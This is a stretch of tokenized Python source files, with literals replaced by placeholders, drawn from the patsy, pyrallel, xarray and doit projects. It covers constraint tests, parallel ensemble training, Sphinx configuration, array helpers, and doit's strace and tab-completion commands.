<NUM_LIT:0> ] ] ) <EOL> t ( "<STR_LIT>" , [ "<STR_LIT:a>" , "<STR_LIT:b>" ] , [ [ - <NUM_LIT:1> , <NUM_LIT:0> ] ] , [ [ <NUM_LIT:1> ] ] ) <EOL> t ( "<STR_LIT>" , [ "<STR_LIT:a>" , "<STR_LIT:b>" ] , [ [ <NUM_LIT:0> , <NUM_LIT:2> ] ] , [ [ <NUM_LIT:0> ] ] ) <EOL> t ( "<STR_LIT>" , [ "<STR_LIT:a>" , "<STR_LIT:b>" ] , [ [ <NUM_LIT:1> , <NUM_LIT:0> ] , [ <NUM_LIT:0> , - <NUM_LIT:1> ] ] , [ [ <NUM_LIT:1> ] , [ - <NUM_LIT:1> ] ] ) <EOL> t ( "<STR_LIT>" , [ "<STR_LIT:a>" , "<STR_LIT:b>" ] , [ [ <NUM_LIT:0> , - <NUM_LIT:1> ] , [ <NUM_LIT:1> , <NUM_LIT:0> ] ] , [ [ - <NUM_LIT:1> ] , [ <NUM_LIT:1> ] ] ) <EOL> t ( "<STR_LIT>" , [ "<STR_LIT:a>" , "<STR_LIT:b>" , "<STR_LIT:c>" ] , <EOL> [ [ <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:0> ] , [ <NUM_LIT:1> , - <NUM_LIT:1> , <NUM_LIT:0> ] , [ <NUM_LIT:0> , <NUM_LIT:1> , - <NUM_LIT:1> ] ] , [ [ <NUM_LIT:1> ] , [ <NUM_LIT:0> ] , [ <NUM_LIT:0> ] ] ) <EOL> t ( "<STR_LIT>" , [ "<STR_LIT:a>" , "<STR_LIT>" ] , [ [ <NUM_LIT:0> , <NUM_LIT:1> ] ] , [ [ <NUM_LIT:2> ] ] ) <EOL> t ( ( [ <NUM_LIT:10> , <NUM_LIT:20> ] , [ <NUM_LIT:30> ] ) , [ "<STR_LIT:a>" , "<STR_LIT:b>" ] , [ [ <NUM_LIT:10> , <NUM_LIT:20> ] ] , [ [ <NUM_LIT:30> ] ] ) <EOL> t ( ( [ [ <NUM_LIT:10> , <NUM_LIT:20> ] , [ <NUM_LIT:20> , <NUM_LIT> ] ] , [ [ <NUM_LIT:30> ] , [ <NUM_LIT> ] ] ) , [ "<STR_LIT:a>" , "<STR_LIT:b>" ] , <EOL> [ [ <NUM_LIT:10> , <NUM_LIT:20> ] , [ <NUM_LIT:20> , <NUM_LIT> ] ] , [ [ <NUM_LIT:30> ] , [ <NUM_LIT> ] ] ) <EOL> assert_raises ( ValueError , linear_constraint , <EOL> ( [ <NUM_LIT:1> , <NUM_LIT:0> ] , [ <NUM_LIT:0> ] , [ <NUM_LIT:0> ] ) , [ "<STR_LIT:a>" , "<STR_LIT:b>" ] ) <EOL> assert_raises ( ValueError , linear_constraint , ( [ <NUM_LIT:1> , <NUM_LIT:0> ] , ) , [ "<STR_LIT:a>" , "<STR_LIT:b>" ] ) <EOL> t ( [ <NUM_LIT:10> , <NUM_LIT:20> ] , [ "<STR_LIT:a>" , "<STR_LIT:b>" ] , [ [ <NUM_LIT:10> , <NUM_LIT:20> ] ] , [ [ <NUM_LIT:0> ] ] ) <EOL> t ( [ [ <NUM_LIT:10> , <NUM_LIT:20> ] , [ <NUM_LIT:20> , <NUM_LIT> ] ] , [ "<STR_LIT:a>" , "<STR_LIT:b>" ] , [ [ <NUM_LIT:10> , <NUM_LIT:20> ] , [ <NUM_LIT:20> , <NUM_LIT> ] ] , [ [ <NUM_LIT:0> ] , [ <NUM_LIT:0> ] ] ) <EOL> t ( np . array ( [ <NUM_LIT:10> , <NUM_LIT:20> ] ) , [ "<STR_LIT:a>" , "<STR_LIT:b>" ] , [ [ <NUM_LIT:10> , <NUM_LIT:20> ] ] , [ [ <NUM_LIT:0> ] ] ) <EOL> t ( np . array ( [ [ <NUM_LIT:10> , <NUM_LIT:20> ] , [ <NUM_LIT:20> , <NUM_LIT> ] ] ) , [ "<STR_LIT:a>" , "<STR_LIT:b>" ] , <EOL> [ [ <NUM_LIT:10> , <NUM_LIT:20> ] , [ <NUM_LIT:20> , <NUM_LIT> ] ] , [ [ <NUM_LIT:0> ] , [ <NUM_LIT:0> ] ] ) <EOL> assert_raises ( ValueError , linear_constraint , None , [ "<STR_LIT:a>" , "<STR_LIT:b>" ] ) <EOL> _parse_eval_error_tests = [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> ] <EOL> from patsy . parse_formula import _parsing_error_test <EOL> def test_eval_errors ( ) : <EOL> def doit ( bad_code ) : <EOL> return linear_constraint ( bad_code , [ "<STR_LIT:a>" , "<STR_LIT:b>" , "<STR_LIT:c>" ] ) <EOL> _parsing_error_test ( doit , _parse_eval_error_tests ) </s>
<s> """<STR_LIT>""" <EOL> import uuid <EOL> import os <EOL> from random import Random <EOL> from copy import copy <EOL> from IPython . parallel import interactive <EOL> from sklearn . base import clone <EOL> from sklearn . externals import joblib <EOL> from pyrallel . common import TaskManager <EOL> from pyrallel . mmap_utils import host_dump <EOL> try : <EOL> basestring <EOL> except NameError : <EOL> basestring = ( str , bytes ) <EOL> def combine ( all_ensembles ) : <EOL> """<STR_LIT>""" <EOL> final_ensemble = copy ( all_ensembles [ <NUM_LIT:0> ] ) <EOL> final_ensemble . estimators_ = [ ] <EOL> for ensemble in all_ensembles : <EOL> final_ensemble . estimators_ += ensemble . estimators_ <EOL> final_ensemble . n_estimators = len ( final_ensemble . estimators_ ) <EOL> return final_ensemble <EOL> def sub_ensemble ( ensemble , n_estimators , seed = None ) : <EOL> """<STR_LIT>""" <EOL> rng = Random ( seed ) <EOL> final_ensemble = copy ( ensemble ) <EOL> if n_estimators > len ( ensemble . estimators_ ) : <EOL> raise ValueError ( <EOL> "<STR_LIT>" <EOL> % ( n_estimators , len ( ensemble . estimators_ ) ) ) <EOL> final_ensemble . estimators_ = rng . sample ( <EOL> ensemble . estimators_ , n_estimators ) <EOL> final_ensemble . n_estimators = len ( final_ensemble . estimators_ ) <EOL> return final_ensemble <EOL> @ interactive <EOL> def train_model ( model , data_filename , model_filename = None , <EOL> random_state = None ) : <EOL> from sklearn . externals import joblib <EOL> X , y , sample_weight = joblib . load ( data_filename , mmap_mode = '<STR_LIT:r>' ) <EOL> model . set_params ( random_state = random_state ) <EOL> if sample_weight is not None : <EOL> model . fit ( X , y , sample_weight = sample_weight ) <EOL> else : <EOL> model . fit ( X , y ) <EOL> for estimator in model . estimators_ : <EOL> if ( hasattr ( estimator , '<STR_LIT>' ) <EOL> and hasattr ( estimator . tree_ , '<STR_LIT>' ) ) : <EOL> estimator . tree_ . random_state = <NUM_LIT:0> <EOL> if model_filename is not None : <EOL> joblib . dump ( model , model_filename ) <EOL> return model_filename <EOL> return model <EOL> class EnsembleGrower ( TaskManager ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , load_balanced_view , base_model ) : <EOL> self . tasks = [ ] <EOL> self . base_model = base_model <EOL> self . lb_view = load_balanced_view <EOL> self . _temp_files = [ ] <EOL> def reset ( self ) : <EOL> self . abort ( ) <EOL> self . tasks [ : ] = [ ] <EOL> for filename in self . _temp_files : <EOL> os . unlink ( filename ) <EOL> del self . _temp_files [ : ] <EOL> def launch ( self , X , y , sample_weight = None , n_estimators = <NUM_LIT:1> , pre_warm = True , <EOL> folder = "<STR_LIT:.>" , name = None , dump_models = False ) : <EOL> self . reset ( ) <EOL> if name is None : <EOL> name = uuid . uuid4 ( ) . get_hex ( ) <EOL> if not os . path . exists ( folder ) : <EOL> os . makedirs ( folder ) <EOL> data_filename = os . path . join ( folder , name + '<STR_LIT>' ) <EOL> data_filename = os . path . abspath ( data_filename ) <EOL> host_dump ( self . lb_view . client , ( X , y , sample_weight ) , data_filename , <EOL> pre_warm = pre_warm ) <EOL> for i in range ( n_estimators ) : <EOL> base_model = clone ( self . base_model ) <EOL> if dump_models : <EOL> model_filename = os . path . join ( <EOL> folder , name + '<STR_LIT>' % i ) <EOL> model_filename = os . path . abspath ( model_filename ) <EOL> else : <EOL> model_filename = None <EOL> self . tasks . append ( self . lb_view . apply ( <EOL> train_model , base_model , data_filename , model_filename , <EOL> random_state = i ) ) <EOL> return self <EOL> def report ( self , n_top = <NUM_LIT:5> ) : <EOL> output = ( "<STR_LIT>" <EOL> "<STR_LIT>" ) . format ( <EOL> int ( <NUM_LIT:100> * self . progress ( ) ) , self . completed ( ) , self . total ( ) , <EOL> self . elapsed ( ) ) <EOL> return output <EOL> def __repr__ ( self ) : <EOL> return self . report ( ) <EOL> def aggregate_model ( self , mmap_mode = '<STR_LIT:r>' ) : <EOL> ready_models = [ ] <EOL> for task in self . completed_tasks ( ) : <EOL> result = task . get ( ) <EOL> if isinstance ( result , basestring ) : <EOL> result = joblib . load ( result , mmap_mode = mmap_mode ) <EOL> ready_models . append ( result ) <EOL> if not ready_models : <EOL> return None <EOL> return combine ( ready_models ) </s>
<s> import sys <EOL> import os <EOL> print "<STR_LIT>" , sys . executable <EOL> print "<STR_LIT>" , sys . path <EOL> try : <EOL> import numpy <EOL> print "<STR_LIT>" % ( numpy . __version__ , numpy . __file__ ) <EOL> except ImportError : <EOL> print "<STR_LIT>" <EOL> try : <EOL> import scipy <EOL> print "<STR_LIT>" % ( scipy . __version__ , scipy . __file__ ) <EOL> except ImportError : <EOL> print "<STR_LIT>" <EOL> try : <EOL> import pandas <EOL> print "<STR_LIT>" % ( pandas . __version__ , pandas . __file__ ) <EOL> except ImportError : <EOL> print "<STR_LIT>" <EOL> try : <EOL> import matplotlib <EOL> matplotlib . use ( '<STR_LIT>' ) <EOL> print "<STR_LIT>" % ( matplotlib . __version__ , matplotlib . __file__ ) <EOL> except ImportError : <EOL> print "<STR_LIT>" <EOL> try : <EOL> import IPython <EOL> print "<STR_LIT>" % ( IPython . __version__ , IPython . __file__ ) <EOL> except ImportError : <EOL> print "<STR_LIT>" <EOL> try : <EOL> import seaborn <EOL> print "<STR_LIT>" % ( seaborn . __version__ , seaborn . __file__ ) <EOL> except ImportError : <EOL> print "<STR_LIT>" <EOL> import linecache <EOL> import re <EOL> from inspect import getsourcefile , getfile , getmodule , ismodule , isclass , ismethod , isfunction , istraceback , isframe , iscode <EOL> def findsource ( object ) : <EOL> """<STR_LIT>""" <EOL> file = getsourcefile ( object ) or getfile ( object ) <EOL> globals_dict = None <EOL> if inspect . isframe ( object ) : <EOL> globals_dict = object . f_globals <EOL> else : <EOL> module = getmodule ( object , file ) <EOL> if module : <EOL> globals_dict = module . __dict__ <EOL> lines = linecache . getlines ( file , globals_dict ) <EOL> if not lines : <EOL> raise IOError ( '<STR_LIT>' ) <EOL> if ismodule ( object ) : <EOL> return lines , <NUM_LIT:0> <EOL> if isclass ( object ) : <EOL> name = object . __name__ <EOL> pat = re . compile ( r'<STR_LIT>' + name + r'<STR_LIT>' ) <EOL> candidates = [ ] <EOL> for i in range ( len ( lines ) ) : <EOL> match = pat . match ( lines [ i ] ) <EOL> if match : <EOL> if lines [ i ] [ <NUM_LIT:0> ] == '<STR_LIT:c>' : <EOL> return lines , i <EOL> candidates . append ( ( match . group ( <NUM_LIT:1> ) , i ) ) <EOL> if candidates : <EOL> candidates . sort ( ) <EOL> return lines , candidates [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] <EOL> else : <EOL> raise IOError ( '<STR_LIT>' ) <EOL> if ismethod ( object ) : <EOL> object = object . __func__ <EOL> if isfunction ( object ) : <EOL> object = object . __code__ <EOL> if istraceback ( object ) : <EOL> object = object . tb_frame <EOL> if isframe ( object ) : <EOL> object = object . f_code <EOL> if iscode ( object ) : <EOL> if not hasattr ( object , '<STR_LIT>' ) : <EOL> raise IOError ( '<STR_LIT>' ) <EOL> pat = re . compile ( r'<STR_LIT>' ) <EOL> pmatch = pat . match <EOL> lnum = min ( object . co_firstlineno , len ( lines ) ) - <NUM_LIT:1> <EOL> while lnum > <NUM_LIT:0> : <EOL> if pmatch ( lines [ lnum ] ) : break <EOL> lnum -= <NUM_LIT:1> <EOL> return lines , lnum <EOL> raise IOError ( '<STR_LIT>' ) <EOL> import inspect <EOL> inspect . findsource = findsource <EOL> extensions = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> extlinks = { '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT>' ) } <EOL> autosummary_generate = True <EOL> numpydoc_class_members_toctree = True <EOL> numpydoc_show_class_members = False <EOL> templates_path = [ '<STR_LIT>' ] <EOL> source_suffix = '<STR_LIT>' <EOL> master_doc = '<STR_LIT:index>' <EOL> project = u'<STR_LIT>' <EOL> copyright = u'<STR_LIT>' <EOL> import xarray <EOL> version = xarray . version . short_version <EOL> release = xarray . __version__ <EOL> exclude_patterns = [ '<STR_LIT>' ] <EOL> pygments_style = '<STR_LIT>' <EOL> on_rtd = os . environ . get ( '<STR_LIT>' , None ) == '<STR_LIT:True>' <EOL> if not on_rtd : <EOL> import sphinx_rtd_theme <EOL> html_theme = '<STR_LIT>' <EOL> html_theme_path = [ sphinx_rtd_theme . get_html_theme_path ( ) ] <EOL> html_static_path = [ '<STR_LIT>' ] <EOL> htmlhelp_basename = '<STR_LIT>' <EOL> latex_elements = { <EOL> } <EOL> latex_documents = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , u'<STR_LIT>' , <EOL> u'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> man_pages = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , u'<STR_LIT>' , <EOL> [ u'<STR_LIT>' ] , <NUM_LIT:1> ) <EOL> ] <EOL> texinfo_documents = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , u'<STR_LIT>' , <EOL> u'<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ) , <EOL> ] <EOL> intersphinx_mapping = { <EOL> '<STR_LIT>' : ( '<STR_LIT>' , None ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , None ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , None ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , None ) , <EOL> } </s>
<s> import numpy as np <EOL> import pandas as pd <EOL> import warnings <EOL> from . pycompat import builtins , reduce <EOL> def _validate_axis ( data , axis ) : <EOL> ndim = data . ndim <EOL> if not - ndim <= axis < ndim : <EOL> raise IndexError ( '<STR_LIT>' <EOL> % ( axis , ndim , ndim ) ) <EOL> if axis < <NUM_LIT:0> : <EOL> axis += ndim <EOL> return axis <EOL> def _select_along_axis ( values , idx , axis ) : <EOL> other_ind = np . ix_ ( * [ np . arange ( s ) for s in idx . shape ] ) <EOL> sl = other_ind [ : axis ] + ( idx , ) + other_ind [ axis : ] <EOL> return values [ sl ] <EOL> def nanfirst ( values , axis ) : <EOL> axis = _validate_axis ( values , axis ) <EOL> idx_first = np . argmax ( ~ pd . isnull ( values ) , axis = axis ) <EOL> return _select_along_axis ( values , idx_first , axis ) <EOL> def nanlast ( values , axis ) : <EOL> axis = _validate_axis ( values , axis ) <EOL> rev = ( slice ( None ) , ) * axis + ( slice ( None , None , - <NUM_LIT:1> ) , ) <EOL> idx_last = - <NUM_LIT:1> - np . argmax ( ~ pd . isnull ( values ) [ rev ] , axis = axis ) <EOL> return _select_along_axis ( values , idx_last , axis ) <EOL> def _calc_concat_shape ( arrays , axis = <NUM_LIT:0> ) : <EOL> first_shape = arrays [ <NUM_LIT:0> ] . shape <EOL> length = builtins . sum ( a . shape [ axis ] for a in arrays ) <EOL> result_shape = first_shape [ : axis ] + ( length , ) + first_shape [ ( axis + <NUM_LIT:1> ) : ] <EOL> return result_shape <EOL> def interleaved_concat ( arrays , indices , axis = <NUM_LIT:0> ) : <EOL> arrays = [ np . asarray ( a ) for a in arrays ] <EOL> axis = _validate_axis ( arrays [ <NUM_LIT:0> ] , axis ) <EOL> result_shape = _calc_concat_shape ( arrays , axis = axis ) <EOL> dtype = reduce ( np . promote_types , [ a . dtype for a in arrays ] ) <EOL> result = np . empty ( result_shape , dtype ) <EOL> key = [ slice ( None ) ] * result . ndim <EOL> for a , ind in zip ( arrays , indices ) : <EOL> key [ axis ] = ind <EOL> result [ key ] = a <EOL> return result <EOL> def _ensure_bool_is_ndarray ( result , * args ) : <EOL> if isinstance ( result , bool ) : <EOL> shape = np . broadcast ( * args ) . shape <EOL> constructor = np . ones if result else np . zeros <EOL> result = constructor ( shape , dtype = bool ) <EOL> return result <EOL> def array_eq ( self , other ) : <EOL> with warnings . catch_warnings ( ) : <EOL> warnings . filterwarnings ( '<STR_LIT:ignore>' , r'<STR_LIT>' ) <EOL> return _ensure_bool_is_ndarray ( self == other , self , other ) <EOL> def array_ne ( self , other ) : <EOL> with warnings . catch_warnings ( ) : <EOL> warnings . filterwarnings ( '<STR_LIT:ignore>' , r'<STR_LIT>' ) <EOL> return _ensure_bool_is_ndarray ( self != other , self , other ) </s>
<s> """<STR_LIT>""" <EOL> import numpy as _np <EOL> from . core . variable import Variable as _Variable <EOL> from . core . dataset import Dataset as _Dataset <EOL> from . core . dataarray import DataArray as _DataArray <EOL> from . core . groupby import GroupBy as _GroupBy <EOL> from . core . pycompat import dask_array_type as _dask_array_type <EOL> from . core . ops import _dask_or_eager_func <EOL> _xarray_types = ( _Variable , _DataArray , _Dataset , _GroupBy ) <EOL> _dispatch_order = ( _np . ndarray , _dask_array_type ) + _xarray_types <EOL> def _dispatch_priority ( obj ) : <EOL> for priority , cls in enumerate ( _dispatch_order ) : <EOL> if isinstance ( obj , cls ) : <EOL> return priority <EOL> return - <NUM_LIT:1> <EOL> def _create_op ( name ) : <EOL> def func ( * args , ** kwargs ) : <EOL> new_args = args <EOL> f = _dask_or_eager_func ( name ) <EOL> if len ( args ) > <NUM_LIT:2> or len ( args ) == <NUM_LIT:0> : <EOL> raise TypeError ( '<STR_LIT>' % <EOL> ( len ( args ) , name ) ) <EOL> elif len ( args ) == <NUM_LIT:1> : <EOL> if isinstance ( args [ <NUM_LIT:0> ] , _xarray_types ) : <EOL> f = args [ <NUM_LIT:0> ] . _unary_op ( func ) <EOL> else : <EOL> p1 , p2 = map ( _dispatch_priority , args ) <EOL> if p1 >= p2 : <EOL> if isinstance ( args [ <NUM_LIT:0> ] , _xarray_types ) : <EOL> f = args [ <NUM_LIT:0> ] . _binary_op ( func ) <EOL> else : <EOL> if isinstance ( args [ <NUM_LIT:1> ] , _xarray_types ) : <EOL> f = args [ <NUM_LIT:1> ] . _binary_op ( func , reflexive = True ) <EOL> new_args = tuple ( reversed ( args ) ) <EOL> res = f ( * new_args , ** kwargs ) <EOL> if res is NotImplemented : <EOL> raise TypeError ( '<STR_LIT>' <EOL> % ( name , type ( args [ <NUM_LIT:0> ] ) , type ( args [ <NUM_LIT:1> ] ) ) ) <EOL> return res <EOL> func . __name__ = name <EOL> doc = getattr ( _np , name ) . __doc__ <EOL> func . __doc__ = ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' % ( name , doc ) ) <EOL> return func <EOL> __all__ = """<STR_LIT>""" . split ( ) <EOL> for name in __all__ : <EOL> globals ( ) [ name ] = _create_op ( name ) </s>
<s> from doit . tools import create_folder <EOL> BUILD_PATH = "<STR_LIT>" <EOL> def task_build ( ) : <EOL> return { '<STR_LIT>' : [ ( create_folder , [ BUILD_PATH ] ) , <EOL> '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ "<STR_LIT>" % BUILD_PATH ] <EOL> } </s>
<s> def gen_many_tasks ( ) : <EOL> yield { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : [ '<STR_LIT>' ] } <EOL> yield { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : [ '<STR_LIT>' ] } <EOL> def task_all ( ) : <EOL> yield gen_many_tasks ( ) </s>
<s> import sys <EOL> import os <EOL> import re <EOL> from . exceptions import InvalidCommand <EOL> from . action import CmdAction <EOL> from . task import Task <EOL> from . cmd_run import Run <EOL> opt_show_all = { <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:a>' , <EOL> '<STR_LIT>' : '<STR_LIT:all>' , <EOL> '<STR_LIT:type>' : bool , <EOL> '<STR_LIT:default>' : False , <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> } <EOL> opt_keep_trace = { <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:type>' : bool , <EOL> '<STR_LIT:default>' : False , <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> } <EOL> class Strace ( Run ) : <EOL> doc_purpose = "<STR_LIT>" <EOL> doc_usage = "<STR_LIT>" <EOL> doc_description = """<STR_LIT>""" <EOL> cmd_options = ( opt_show_all , opt_keep_trace ) <EOL> TRACE_CMD = "<STR_LIT>" <EOL> TRACE_OUT = '<STR_LIT>' <EOL> def execute ( self , params , args ) : <EOL> """<STR_LIT>""" <EOL> if os . path . exists ( self . TRACE_OUT ) : <EOL> os . unlink ( self . TRACE_OUT ) <EOL> if len ( args ) != <NUM_LIT:1> : <EOL> msg = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> raise InvalidCommand ( msg ) <EOL> result = Run . execute ( self , params , args ) <EOL> if ( not params [ '<STR_LIT>' ] ) and os . path . exists ( self . TRACE_OUT ) : <EOL> os . unlink ( self . TRACE_OUT ) <EOL> return result <EOL> def _execute ( self , show_all ) : <EOL> """<STR_LIT>""" <EOL> selected = self . sel_tasks [ <NUM_LIT:0> ] <EOL> for task in self . task_list : <EOL> if task . name == selected : <EOL> self . wrap_strace ( task ) <EOL> break <EOL> report_strace = Task ( <EOL> '<STR_LIT>' , <EOL> actions = [ ( find_deps , [ self . outstream , self . TRACE_OUT , show_all ] ) ] , <EOL> verbosity = <NUM_LIT:2> , <EOL> task_dep = [ selected ] , <EOL> uptodate = [ False ] , <EOL> ) <EOL> self . task_list . append ( report_strace ) <EOL> self . sel_tasks . append ( report_strace . name ) <EOL> return Run . _execute ( self , sys . stdout ) <EOL> @ classmethod <EOL> def wrap_strace ( cls , task ) : <EOL> """<STR_LIT>""" <EOL> wrapped_actions = [ ] <EOL> for action in task . actions : <EOL> if isinstance ( action , CmdAction ) : <EOL> cmd = cls . TRACE_CMD % ( action . _action , cls . TRACE_OUT ) <EOL> wrapped = CmdAction ( cmd , task , save_out = action . save_out ) <EOL> wrapped_actions . append ( wrapped ) <EOL> else : <EOL> wrapped_actions . append ( action ) <EOL> task . _action_instances = wrapped_actions <EOL> task . _extend_uptodate ( [ False ] ) <EOL> def find_deps ( outstream , strace_out , show_all ) : <EOL> """<STR_LIT>""" <EOL> regex = re . compile ( r'<STR_LIT>' + <EOL> r'<STR_LIT>' ) <EOL> read = set ( ) <EOL> write = set ( ) <EOL> cwd = os . getcwd ( ) <EOL> if not os . path . exists ( strace_out ) : <EOL> return <EOL> with open ( strace_out ) as text : <EOL> for line in text : <EOL> match = regex . match ( line ) <EOL> if not match : <EOL> continue <EOL> rel_name = match . group ( '<STR_LIT:file>' ) <EOL> name = os . path . abspath ( rel_name ) <EOL> if not show_all : <EOL> if not name . startswith ( cwd ) : <EOL> continue <EOL> if '<STR_LIT>' in match . group ( '<STR_LIT>' ) : <EOL> if name not in write : <EOL> write . add ( name ) <EOL> outstream . write ( "<STR_LIT>" % name ) <EOL> else : <EOL> if name not in read : <EOL> read . add ( name ) <EOL> outstream . write ( "<STR_LIT>" % name ) </s>
<s> from io import StringIO <EOL> import pytest <EOL> from doit . exceptions import InvalidCommand <EOL> from doit . cmdparse import CmdOption <EOL> from doit . plugin import PluginDict <EOL> from doit . task import Task <EOL> from doit . cmd_base import Command , TaskLoader , DodoTaskLoader <EOL> from doit . cmd_completion import TabCompletion <EOL> from doit . cmd_help import Help <EOL> from . conftest import CmdFactory <EOL> class FakeLoader ( TaskLoader ) : <EOL> def load_tasks ( self , cmd , params , args ) : <EOL> task_list = [ <EOL> Task ( "<STR_LIT>" , None , ) , <EOL> Task ( "<STR_LIT>" , None , task_dep = [ '<STR_LIT>' ] , has_subtask = True , ) , <EOL> Task ( "<STR_LIT>" , None , is_subtask = True ) , <EOL> ] <EOL> return task_list , { } <EOL> @ pytest . fixture <EOL> def commands ( request ) : <EOL> sub_cmds = { } <EOL> sub_cmds [ '<STR_LIT>' ] = TabCompletion <EOL> sub_cmds [ '<STR_LIT>' ] = Help <EOL> return PluginDict ( sub_cmds ) <EOL> def test_invalid_shell_option ( ) : <EOL> cmd = CmdFactory ( TabCompletion ) <EOL> pytest . raises ( InvalidCommand , cmd . execute , <EOL> { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : False } , [ ] ) <EOL> class TestCmdCompletionBash ( object ) : <EOL> def test_with_dodo__dinamic_tasks ( self , commands ) : <EOL> output = StringIO ( ) <EOL> cmd = CmdFactory ( TabCompletion , task_loader = DodoTaskLoader ( ) , <EOL> outstream = output , cmds = commands ) <EOL> cmd . execute ( { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : False } , [ ] ) <EOL> got = output . getvalue ( ) <EOL> assert '<STR_LIT>' in got <EOL> assert '<STR_LIT>' not in got <EOL> assert '<STR_LIT>' in got <EOL> def test_no_dodo__hardcoded_tasks ( self , commands ) : <EOL> output = StringIO ( ) <EOL> cmd = CmdFactory ( TabCompletion , task_loader = FakeLoader ( ) , <EOL> outstream = output , cmds = commands ) <EOL> cmd . execute ( { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : True } , [ ] ) <EOL> got = output . getvalue ( ) <EOL> assert '<STR_LIT>' not in got <EOL> assert '<STR_LIT>' in got <EOL> def test_cmd_takes_file_args ( self , commands ) : <EOL> output = StringIO ( ) <EOL> cmd = CmdFactory ( TabCompletion , task_loader = FakeLoader ( ) , <EOL> outstream = output , cmds = commands ) <EOL> cmd . execute ( { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : False } , [ ] ) <EOL> got = output . getvalue ( ) <EOL> assert """<STR_LIT>""" in got <EOL> assert """<STR_LIT>""" in got <EOL> class TestCmdCompletionZsh ( object ) : <EOL> def test_zsh_arg_line ( self ) : <EOL> opt1 = CmdOption ( { '<STR_LIT:name>' : '<STR_LIT>' , '<STR_LIT:default>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> assert '<STR_LIT>' == TabCompletion . _zsh_arg_line ( opt1 ) <EOL> opt2 = CmdOption ( { '<STR_LIT:name>' : '<STR_LIT>' , '<STR_LIT:default>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:s>' } ) <EOL> assert '<STR_LIT>' == TabCompletion . _zsh_arg_line ( opt2 ) <EOL> opt3 = CmdOption ( { '<STR_LIT:name>' : '<STR_LIT>' , '<STR_LIT:default>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } ) <EOL> assert '<STR_LIT>' == TabCompletion . _zsh_arg_line ( opt3 ) <EOL> opt4 = CmdOption ( { '<STR_LIT:name>' : '<STR_LIT>' , '<STR_LIT:default>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:s>' , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> assert ( '<STR_LIT>' == <EOL> TabCompletion . _zsh_arg_line ( opt4 ) ) <EOL> opt5 = CmdOption ( { '<STR_LIT:name>' : '<STR_LIT>' , '<STR_LIT:default>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '''<STR_LIT>''' , <EOL> '<STR_LIT>' : '<STR_LIT:s>' , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> assert ( '''<STR_LIT>''' == <EOL> TabCompletion . _zsh_arg_line ( opt5 ) ) <EOL> def test_cmd_arg_list ( self ) : <EOL> no_args = TabCompletion . _zsh_arg_list ( Command ( ) ) <EOL> assert "<STR_LIT>" not in no_args <EOL> assert "<STR_LIT>" not in no_args <EOL> class CmdTakeTasks ( Command ) : <EOL> doc_usage = '<STR_LIT>' <EOL> with_task_args = TabCompletion . _zsh_arg_list ( CmdTakeTasks ( ) ) <EOL> assert "<STR_LIT>" in with_task_args <EOL> assert "<STR_LIT>" not in with_task_args <EOL> class CmdTakeCommands ( Command ) : <EOL> doc_usage = '<STR_LIT>' <EOL> with_cmd_args = TabCompletion . _zsh_arg_list ( CmdTakeCommands ( ) ) <EOL> assert "<STR_LIT>" not in with_cmd_args <EOL> assert "<STR_LIT>" in with_cmd_args <EOL> def test_cmds_with_params ( self , commands ) : <EOL> output = StringIO ( ) <EOL> cmd = CmdFactory ( TabCompletion , task_loader = DodoTaskLoader ( ) , <EOL> outstream = output , cmds = commands ) <EOL> cmd . execute ( { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : False } , [ ] ) <EOL> got = output . getvalue ( ) <EOL> assert "<STR_LIT>" in got <EOL> def test_hardcoded_tasks ( self , commands ) : <EOL> output = StringIO ( ) <EOL> cmd = CmdFactory ( TabCompletion , task_loader = FakeLoader ( ) , <EOL> outstream = output , cmds = commands ) <EOL> cmd . execute ( { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : True } , [ 